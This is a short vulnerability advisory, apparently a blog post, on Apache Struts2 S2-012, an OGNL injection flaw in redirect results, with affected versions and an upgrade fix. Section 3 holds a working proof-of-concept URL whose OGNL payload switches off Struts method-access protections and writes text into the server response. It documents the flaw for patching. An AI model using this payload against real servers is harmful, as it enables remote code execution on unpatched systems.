catalog
1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix
1. Description
OGNL provides, among other features, extensive expression evaluation capabilities.
A request that included a specially crafted request parameter could be used to inject arbitrary OGNL code into a property, afterward used as request parameter of a redirect address, which will cause a further evaluation.
OGNL evaluation was already addressed in S2-003 and S2-005 and S2-009, but, since it involved just the parameter‘s name, it turned out that the resulting fixes based on whitelisting acceptable parameter names and denying evaluation of the expression contained in parameter names, closed the vulnerability only partially.
The second evaluation happens when redirect result reads it from the stack and uses the previously injected code as redirect parameter.
This lets malicious users put arbitrary OGNL statements into any unsanitized String variable exposed by an action and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.
2. Effected Scope
Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13
3. Exploit Analysis
0x1: POC
http://localhost:8080/S2-XX/Login.action?skillName=%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false) #[email protected]@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}
Relevant Link:
http://struts.apache.org/docs/s2-012.html
4. Principle Of Vulnerability
truts2中可以通过${express}或%{express}来引用ongl表达式,当配置一个action中有${input}或%{input}且input来自于外部输入时,给input赋值%{exp},从而导致任意代码执行
5. Patch Fix
0x1: upgrade struts2
It is strongly recommended to upgrade to Struts 2.3.14.1, which contains the corrected OGNL and XWork library. //The OGNLUtil class was changed to deny eval expressions by default.
Relevant Link:
Copyright (c) 2015 Little5ann All rights reserved